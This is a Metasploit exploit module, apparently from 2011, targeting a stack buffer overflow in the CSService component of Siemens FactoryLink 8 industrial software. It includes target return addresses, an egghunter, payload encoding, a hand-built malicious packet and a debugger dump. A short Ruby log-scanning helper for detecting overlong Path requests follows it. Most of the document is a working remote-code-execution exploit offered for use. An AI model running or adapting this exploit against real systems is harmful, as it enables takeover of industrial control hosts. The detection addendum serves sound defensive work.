##
# $Id: factorylink_csservice.rb 13019 2011-06-25 00:54:18Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Egghunter

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow",
			'Description'    => %q{
					This module exploits a vulnerability found on Siemens FactoryLink 8. The
				vulnerability occurs when CSService.exe processes a CSMSG_ListFiles_REQ message:
				the user-supplied path first gets converted to ANSI format (CodePage 0), and then
				gets handled by a logging routine where proper bounds checking is not done,
				therefore causing a stack-based buffer overflow, which results in arbitrary code
				execution.
			},
			'License'        => MSF_LICENSE,
			'Version'        => "$Revision: 13019 $",
			'Author'         =>
				[
					'Luigi Auriemma <aluigi[at]autistici.org>',  #Initial discovery, poc
					'sinn3r',                                    #Metasploit (thx hal)
				],
			'References'     =>
				[
					['URL', 'http://aluigi.altervista.org/adv/factorylink_1-adv.txt'],
				],
			'Payload'        =>
				{
					'BadChars' => "\x00\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f",
					'StackAdjustment' => -3500,
					'EncoderType'     => Msf::Encoder::Type::AlphanumMixed,
					'EncoderOptions'  => {'BufferRegister'=>'ECX'},
				},
			'DefaultOptions' =>
				{
					'ExitFunction' => "process",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'Windows XP SP3',
						{
							'Offset' => 965,        #Offset to overwrite RETN
							'Ret'    => 0x7e4456f7, #JMP ESP in USER32.dll
							'Max'    => 1400,       #Max buffer used
						}
					],
					[
						'Windows Server 2003 SP0',
						{
							'Offset' => 965,
							'Ret'    => 0x77d20738, #JMP ESP in USER32.dll
							'Max'    => 1400,
						}
					]
				],
			'Privileged'     => false,
			'DisclosureDate' => "Mar 25 2011"))

		register_options(
			[
				Opt::RPORT(7580)
			], self.class)
	end

	#User input will get converted back to ANSI with WideCharToMultiByte before vsprintf,
	#so every byte is sent as a UTF-16LE code unit (byte followed by \x00)
	def to_unicode(text)
		output = ''
		(text.length).times do |i|
			output << text[i,1] << "\x00"
		end
		return output
	end

	def exploit
		#Modify payload
		#XP = Align EAX 0x3a bytes. Win2k3SP0 = 0x0a bytes
		p  = "\x57"   #PUSH EDI
		p << "\x59"   #POP ECX
		p << ((target.name =~ /server 2003/i) ? "\xb0\x0a" : "\xb0\x3a")  #MOV AL, <align bytes>
		p << "\x30\xc1"   #XOR CL,AL
		p << payload.encoded

		#Meterpreter tends to fail because of it being mangled. We use an egghunter
		#instead to ensure the payload's integrity.
		egg_options = {
			:checksum => true,
			:eggtag   => "W00T",
		}
		egghunter, p = generate_egghunter(p, payload_badchars, egg_options)

		#x86/alpha_mixed egghunter
		alpha_encoder = framework.encoders.create("x86/alpha_mixed")
		alpha_encoder.datastore.import_options_from_hash( {'BufferRegister'=>'ESP'} )
		egghunter = alpha_encoder.encode(egghunter, nil, nil, platform)

		sploit  = ''
		sploit << make_nops(4)
		sploit << p
		sploit << rand_text_alpha(965-sploit.length)
		sploit << [target.ret].pack('V*')
		sploit << egghunter
		sploit << rand_text_alpha(target['Max']-sploit.length)
		sploit = to_unicode(sploit)

		pkt  = "\x00\x00\x4c\x45\x4e\x00\x40\x0b\x00\x00\x00\x00\x00\x00\x99\x00\x00\x00\x04\x00"
		pkt << "\x00\x00\x01\x07\x00\x00\x0b\x31\x99\x62\x72\x6b\x01\x00\x00\x00\x02\x04\x00\x00"
		pkt << "\x00\x04\x00\x00\x00\x01\x07\x00\x00\x0b\x19\x99\x00\x00\x00\x06\x00\x00\x00\x03"
		pkt << "\x06\x00\x00\x0a\xf6\x11\x22\x33\x44"
		pkt << sploit
		pkt << "\x00\x00\x06\x00\x00\x00\x06\x11\x22\x33\x44\x00\x00\x04\x00\x00\x00\x04\x00\x00"
		pkt << "\x00\x01\x99\x99\x99"

		print_status("Sending malicious request to remote host...")
		connect
		sock.put(pkt)
		handler
		select(nil, nil, nil, 6)
		disconnect
	end
end

=begin
0:000> g
call vsprintf. Destination=0x0012ead0 Format=0x0043b92c Args=0x0012eedc
eax=0012eedc ebx=7c809a99 ecx=0043b92c edx=0012ead0 esi=0012eee8 edi=00000002
eip=0040b908 esp=0012eac4 ebp=0012fabc iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
CSService+0xb908:
0040b908 ff15249b4400    call    dword ptr [CSService+0x49b24 (00449b24)] ds:0023:00449b24={msvcrt!vsprintf (77c3fe49)}
0:000> dc 0012ead0
0012ead0  65535343 63697672 43203a65 47534d53  CSService: CSMSG
0012eae0  73694c5f 6c694674 525f7365 2d205145  _ListFiles_REQ -
0012eaf0  6f685320 72694477 2c303d73 6c694620   ShowDirs=0, Fil
0012eb00  3d726574 6150202c 613d6874 61616161  ter=, Path=aaaaa
0012eb10  61616161 61616161 61616161 61616161  aaaaaaaaaaaaaaaa
0012eb20  61616161 61616161 61616161 61616161  aaaaaaaaaaaaaaaa
0012eb30  61616161 61616161 61616161 61616161  aaaaaaaaaaaaaaaa
0012eb40  61616161 61616161 61616161 61616161  aaaaaaaaaaaaaaaa
=end
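The debugger dump above shows the string the logging routine builds with vsprintf: "CSService: CSMSG_ListFiles_REQ - ShowDirs=0, Filter=, Path=..." followed by the attacker-controlled path. The following detection helper is an added example; it is not part of the Metasploit module, Siemens FactoryLink, or the original advisory. It assumes that CSService writes that formatted string to a log file one entry per line (an assumption; the page only shows it in the stack buffer), and it uses the module's own numbers: a Path of 965 bytes reaches the saved return address and 1400 bytes is the largest buffer the module sends. Anything at or beyond the 965-byte threshold is flagged.

```ruby
# Added detection example (not part of the Metasploit module above).
# Assumption: the CSService logging routine writes the vsprintf-formatted
# string seen in the debugger dump to a log, one entry per line. The 965-byte
# threshold is the module's 'Offset' (distance from the start of the Path
# buffer to the saved return address); 1400 is the module's 'Max' buffer size.

LISTFILES_LOG_RE = /\ACSService: CSMSG_ListFiles_REQ - ShowDirs=(?<showdirs>\d+), Filter=(?<filter>.*?), Path=(?<path>.*)\z/

RETN_OFFSET = 965

# Parse one log entry; returns a Hash, or nil when the line is not a
# CSMSG_ListFiles_REQ log entry.
def parse_listfiles_entry(line)
  m = LISTFILES_LOG_RE.match(line.chomp)
  return nil unless m
  { showdirs: m[:showdirs].to_i, filter: m[:filter], path: m[:path] }
end

# True when the logged (ANSI) path is long enough to reach the saved return
# address. The length is measured after WideCharToMultiByte, so it is half
# the UTF-16 length that was on the wire.
def suspicious_listfiles_entry?(line, threshold = RETN_OFFSET)
  entry = parse_listfiles_entry(line)
  return false unless entry
  entry[:path].bytesize >= threshold
end

# Scan a list of log lines; returns the zero-based indexes of suspicious entries.
def scan_csservice_log(lines, threshold = RETN_OFFSET)
  lines.each_index.select { |i| suspicious_listfiles_entry?(lines[i], threshold) }
end

# Constructed sample entries: two benign requests and one whose Path is 1400
# bytes, the module's 'Max' buffer size.
SAMPLE_LOG = [
  "CSService: CSMSG_ListFiles_REQ - ShowDirs=0, Filter=, Path=C:\\FactoryLink\\data",
  "CSService: CSMSG_ListFiles_REQ - ShowDirs=1, Filter=*.txt, Path=C:\\temp",
  "CSService: CSMSG_ListFiles_REQ - ShowDirs=0, Filter=, Path=" + ("a" * 1400),
]

if __FILE__ == $0
  scan_csservice_log(SAMPLE_LOG).each do |i|
    entry = parse_listfiles_entry(SAMPLE_LOG[i])
    puts "entry #{i + 1}: Path is #{entry[:path].bytesize} bytes (threshold #{RETN_OFFSET})"
  end
end
```

Because the path is logged after the ANSI conversion, a 1400-byte overflow arrives on the wire as 2800 bytes of UTF-16; a network-side check on the raw CSMSG_ListFiles_REQ payload would therefore need to halve the length before comparing it with the same 965-byte threshold.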